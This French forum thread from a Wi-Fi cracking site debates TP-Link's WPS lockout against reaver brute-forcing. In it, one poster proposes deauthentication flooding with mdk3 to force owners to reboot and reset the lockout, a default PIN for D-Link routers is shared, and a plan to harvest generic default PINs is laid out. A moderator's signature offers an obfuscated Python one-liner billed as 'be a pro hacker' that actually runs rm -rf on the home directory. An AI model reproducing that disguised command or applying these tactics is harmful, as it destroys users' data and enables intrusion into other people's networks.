Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 29-10-2012 02:38:28

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

TP-Link "réagit" contre la faille WPS

Presque un an après j la pubication du paper de stefan vinebock et de la sortie de reaver wps et wpscrack, tp-link passe à l'action et sort un firmware pour son dernier modèle équipé du "révolutionnaire" système de blocage comme il y a dans les box et d'autres routeurs.
Je ne vais pas m'attarder sur la vitesse de réaction, ce qui me déconcerte c'est cette foie en cette technologie qui est une stupidité en soi. et viciée depuis ses fondements avec le système de 2 blocks

How to avoid brute force on WPS-QSS

1> ce système de blocage n'est pas une bonne réponse.
On peut ou être tès patient (comme ça été le cas d'un user de lampiweb.com qui a du attendre deux semaines, mais qui a eu la clef d'un routeur netgear avec ce fameux système de blocage) ou faire en sorte que les clients réinicient le routeur et débloquent ainsi le blocage du WPS. après chaque śerie de PIN tentés.
Vous voyez d'ici la beauté du tableau, de grands coup de mdk3 et A0 pour que le gars devienne fou et réincie le routeur... ça va être sympat. avec le crack du blocage wps..

2> même si il y a blocage, il y a possibilité d'essayer un ou quelques PIN. N'est il mpas messieurs les fabricants?.
Ma question est;
  - "Messieurs les fabricants de routeurs, en jouant un petit peu avec les valeurs ce PIN est-il vraiment impossible à relationer avec un autre élément du routeur?
Monsieur Huawai, monsieur belkin, monsieur tp-link et messieurs les fabricants en général: N'avez vous pas laissé certaine relation entre les éléments qui rendent possibles la déduction du PIN WPS par défaut du routeur que nous avons en face de nous?
Êtes vous bien sûr que vous avez bien construit votre PIN en utilisant des éléments et des valeurs bases inaccessibles depuis l’extérieur?
N'est il pas probable que si vous n'avez pas fait ainsi, un petit malin amateur de wifi et crack et linux qui passe par là et se prenne la tête un petit peu trouve et diffuse la modèle suivit par vos routeurs pour générer le PIN par défaut et permettre une attaque rapide et sans bavures et sans déclencher votre contre-mesure?
Avez-vous tous bien travaillé et rendu la déduction du PIN pour le moins difficile?"

Le fait qu'ils maintiennent cete tec hnologie et introduise cette contre mesure indique qu'ils pensent que oui...
Ok, dans ce cas, Comme dirait spawn :

challenge accpeted!

A bientôt donc... le rendez vous est prit...
En-ais je déjà trop dis?... tongue


                                   e0b7e86a74.jpg

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 29-10-2012 07:32:45

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : TP-Link "réagit" contre la faille WPS

J'adore , tu sait de mon avis, il en on rien a foutre des gens, ce qu'il leur faut se sont des pigeons qui achete leur routeur.

Il se sont dit: il on sortie reaver on va faire style de mettre un systeme qui bloque les tentative au bout de X pin errodé, car comme sa les gens se pensent en sécurité mais alors qu'il n'en n'est rien.

Sa me fait penser au box de sfr et de leur faille sur leur hostspot, ils sont au courant ne font rien, tu trouve sa normale?


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#3 29-10-2012 08:28:16

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : TP-Link "réagit" contre la faille WPS

Comme tu le souligne kcdtv il y a toujours moyen de récupérer le WPS, aux messieurs des derniers routeurs D-link équipé du wps et donc de la norme "n" ce nombre vous dis quelque chose? 90244711 tongue

Hors Ligne

#4 29-10-2012 12:52:28

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : TP-Link "réagit" contre la faille WPS

lol.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 29-10-2012 17:50:54

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : TP-Link "réagit" contre la faille WPS

goliate a écrit :

J'adore , tu sait de mon avis, il en on rien a foutre des gens, ce qu'il leur faut se sont des pigeons qui achete leur routeur.

Il se sont dit: il on sortie reaver on va faire style de mettre un systeme qui bloque les tentative au bout de X pin errodé, car comme sa les gens se pensent en sécurité mais alors qu'il n'en n'est rien.

Sa me fait penser au box de sfr et de leur faille sur leur hostspot, ils sont au courant ne font rien, tu trouve sa normale?

Si tu veux un élément en plus pour confirmer ton avis, regardons un petit peu ce que communique netgear à propos de la faille WPS.

How do NETGEAR Home routers defend WiFi Protected Setup PIN against brute force vulnerability?

Wi-Fi Protected Setup (WPS) is a method for setting up a new wireless router for a home network which includes a way for users to set up the network via an external or internal registrar. These methods include:

1. Push Button (PBC) - external registrar
2. Router PIN - external registrar
3. Client PIN - internal registrar or external registrar

By default, all three methods above are enabled. The WPS standard requires a PIN, usually printed on the wireless router or access point itself, to be used during the device setup phase. The vulnerability discovered in WPS makes that PIN highly susceptible to brute force attempts. Netgear home routers will protect themselves after several failed attempts to authenticate as an external registrar by entering a lock-down state. During the lock-down state, all WPS attempts using the Router PIN will not work. The router will return from the lock-down state after a predetermined time period. While the NETGEAR device is in a lock-down state, users can still use the WPS Push Button method to connect to the wireless network.

How do NETGEAR Home routers defend WiFi Protected Setup PIN against brute force vulnerability?

Moi je dis qu'ils utilisent la même fonction qui doit être facile d'implémenter via upgrade du firmware, et qu'aucun c'est vraiment penché à fond sur la question.
Ils ont vu que d'autres fabricants avaient déjà implanté ça, ils se mettent au niveau mécaniquement, l'important c'est l'illusion, l'image avant les faits techniques.
Je me suis confronté grosso modo à deux "catégories" de "AP rate limit" dans mes nombreux essais.
Les deux fonctionnent de la même façon, après 10 pétitions foireuses, le blocage se met en action.
Pas moyen avec un spoofing de contourner ça, et espacer les pétitions dans des délais raisonnables pour que l'attaque soit viable ne fonctionne pas non plus.
Ce qui différencie c'est la longueur du blocage. Dans un cas il s'agit de plus ou moins une heure (celui qu'un user de lampiweb.con a cassé en deux semaines, il voulait démontrer qu'avec de la patience et dans le cas que ce soit votre propre voisin qui vous attaque, vous n'étiez en rien à l'abri...)
Dans l'autre plus de 24 heure (là c'est plus chaud tongue )

@ Koala
Peux tu m'en dire plus sur ce routeur D-Link?
Là je n'ai pas le temps parce que c'est assez long, plus tard (week-end) je vous mettrai les quelques PIN "magiques" que nous avons repertoriés depuis lampiweb.com en 8 mois.
Dans un topic dédié, parce que ce que je vous propose c'est de faire la même chose, chercher les PIN génériques et lorsque le pin n'est pas générique chercher le modèle qui a servit à son élaboration. Flasher les box et routeur pour vois si on ne voit as comment se génère le PIN.
Vous verrez, certains ne cherchent pas midi à 14 heures et je suis sûr que nous allons rencontrer des choses.
C'est un thème sur le quel je travaille depuis que reaver est sortit (avec des données espagnoles) et pour le moment on arrive à plus ou moins 50% des FAI pour lesquels nous pouvons faire une attaque en beaucoup moins de 10 PIN, certains cas un seul, comme c'est la cas il semble des routeur N D-Link dont koala parle. Et nous avons pas vraiment beaucoup de données, mais des fois avec 2 c'est suffisant tongue



ÇA FAIT UN AN QUE REAVER EST SORTIT...
                                                               ...LA REACTION DES FAI EST A GERBER

                                                 PASSONS A L'ACTION!!!!!!!!!!!!!!!!!!!!!

Hors Ligne

#6 29-10-2012 19:05:09

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : TP-Link "réagit" contre la faille WPS

De tete et avec une petite recherche internet il me semble que c'est un D-link DIR-600 mais pas sur il se ressemble tous hmm

Hors Ligne

#7 30-10-2012 18:03:25

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : TP-Link "réagit" contre la faille WPS

grave il se foute des gens sur les derniere box orange l ap se verouille de maniere definitive impossible a re attaquer meme apres un reset de la box la oui sa protege

Hors Ligne

#8 30-10-2012 21:28:56

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : TP-Link "réagit" contre la faille WPS

Protégé un peu mieux, mais la porte est toujours ouverte pour x tentatives...
Je ne trouves pas ça satisfaisant.
C'est laisser un talon d'Achile...
Je sais bien que le bouton est là, que ça a couté des sous pour le concevoir, le mettre sur les lignes de production.
Mais voilà, ils prônent la compéticion et une certaine approche du monde, ils pourraient bien offrir leurs vieux routeurs aux écoles des pays défavorisés (pour donner un exemple) si c'étaient de samaritain...
Ben la vie c'est dur des fois, il y a eu le minitel, c'était une belle idée aussi et il y a eu le WEP, et ça reste plus léger que du WPA et pour les connections de l'époque, bref, le wps aux oubliettes.

Hors Ligne

#9 31-10-2012 11:54:25

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : TP-Link "réagit" contre la faille WPS

On ne peut malheureusement pas changer le mode économique de ces grands géants de l'internet, faudrait un retour aux sources pour y arriver et encore.Il faudrait que le wps soit pas activé par défaut, ainsi la personne l'utilisant agirai en connaissance de cause.

Hors Ligne

#10 31-10-2012 21:17:40

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : TP-Link "réagit" contre la faille WPS

koala a écrit :

On ne peut malheureusement pas changer le mode économique de ces grands géants de l'internet, faudrait un retour aux sources pour y arriver et encore.Il faudrait que le wps soit pas activé par défaut, ainsi la personne l'utilisant agirai en connaissance de cause.

Il a fallut que reaver sorte, pour que je sache qu'il étais activer par défaut chez beaucoup de FAI.


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#11 31-10-2012 22:55:36

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : TP-Link "réagit" contre la faille WPS

Très juste ça Goliate!
Moi j'en étais reste au Qss (l'ancêtre) de tp-link, j'avais toujours pensé que c'était un peu léger un PIN de 8 chiffres en soi.
Je ne pensais pas que ça avait été recommandé par la wifi alliance, encore moins que le PIN était un block de deux PIN et que dans le dernier block le numéro était un checksum, avec les conséquences que  nous savons.
Sans reaver.... ça restait comme ça un bon moment.......

Hors Ligne

#12 01-11-2012 09:59:00

WP4
Membre
Inscription : 25-09-2012
Messages : 11

Re : TP-Link "réagit" contre la faille WPS

surtout que soyons honnêtes... Qui s'en sert de ce PIN ?  (à part les crackeurs de réseaux je veux dire : P )

Hors Ligne

#13 01-11-2012 10:31:29

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : TP-Link "réagit" contre la faille WPS

WP4 a écrit :

surtout que soyons honnêtes... Qui s'en sert de ce PIN ?  (à part les crackeurs de réseaux je veux dire : P )

On ne peut pas s'en servir si on ne connaît même pas son existence sur sa box ^^.


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#14 01-11-2012 18:34:41

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : TP-Link "réagit" contre la faille WPS

Les utilisateurs de tp-link sont plus familiarisés avec cette technologie car la Qss a plus de 5 ans.
Ensuite je pense que les utilisateurs de livebox seront enclins aussi vu qu'il sont habitués à devoir presser un bouton pour autoriser de toute façon l'adresse mac.

Hors Ligne

#15 01-11-2012 19:19:08

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : TP-Link "réagit" contre la faille WPS

perso je me suis jamais servit de ce WPS j'avais l habitude de rentré la longue clé enfaite , donc ouai qui ce sert de sa a mon avis il sont peu nombreux car quand on vous demande de rentré la clé il indique comment entré la longue clé et non pas le mode WPS

Hors Ligne

#16 03-11-2012 00:05:19

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : TP-Link "réagit" contre la faille WPS

WP4 a écrit :

surtout que soyons honnêtes... Qui s'en sert de ce PIN ?  (à part les crackeurs de réseaux je veux dire : P )

Ca peut être utile pour avoir une clé WPA sérieuse (genre =f>t}e;h7'kYZxnxZSi_|6G#NE"0reVv!D%4x{%}C!vqvU"GS\~X9o=>djDkVVe, merci GRC's Ultra High Security Password Generator) tout en permettant de se connecter facilement wink

SI c'était implémenté correctement, ça pourrait avoir un intérêt. Et je dis bien SI !
- si c'était pas implémenté en 2 mini codes indépendants avec checksum
- s'il y avait un mécanisme de blocage d'office (avec délai croissant : 15 secondes après 10 essais, 30 secondes après 20 essais, 60 secondes après 30 essais,...)
=> Alors ça serait sérieux.

Oui, je reconnais que c'est une solution de facilité, et que c'est bancal de sacrifier la sécurité pour plus de facilité, et je n'approuve pas. Mais si ça peut permettre aux gens d'avoir autre chose que "12345678" comme clé WPA, on aura peut-être gagné quelque chose. Bon, pour ça faut changer le système de PIN, on est d'accord :p

J'en reviens à la longueur du PIN, ouais 8 caractère ça paraît court (en supposant que c'est vraiment 8 chiffres) mais vous n'imaginez pas à quel point les gens peuvent être feignasses quand il s'agit de taper une clé (surtout sur un faux clavier genre smartphone). J'ai vu des hôtels où les mecs étaient restés en WEP simplement parce que ça fait ch*er les clients de taper un code à 8 chiffres plutôt que 5 (!!!). C'est une mentalité de m*rde mais c'est ce qui se passe sur le terrain et il faut faire avec hmm C'est sans doute pour ça que la WiFi Alliance existe  pour apporter un côté plus user-firendly et marketing à l'aspect purement technique (et sérieux) de l'IEEE. Bon, OK là ils se sont bien loupés, c'est tellement énorme qu'on pourrait se demander s'ils ne l'ont pas fait exprès pour se garder une porte de service (parano inside) roll

Qu'on soit bien d'accord, je déteste cette approche de la facilité et je ne défends pas le WPS (surtout dans son implémentation actuelle). Mais j'adore jouer l'avocat du Diable et j'essaie quand même de justifier son existence big_smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 160 29-10-2016 11:12:05 par sukawa2007
0 315 26-10-2016 19:06:01 par Christophe93
4 248 20-10-2016 10:57:27 par Bonami2
11 444 05-09-2016 15:07:25 par MiscL
3 430 31-08-2016 20:12:36 par M1ck3y

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]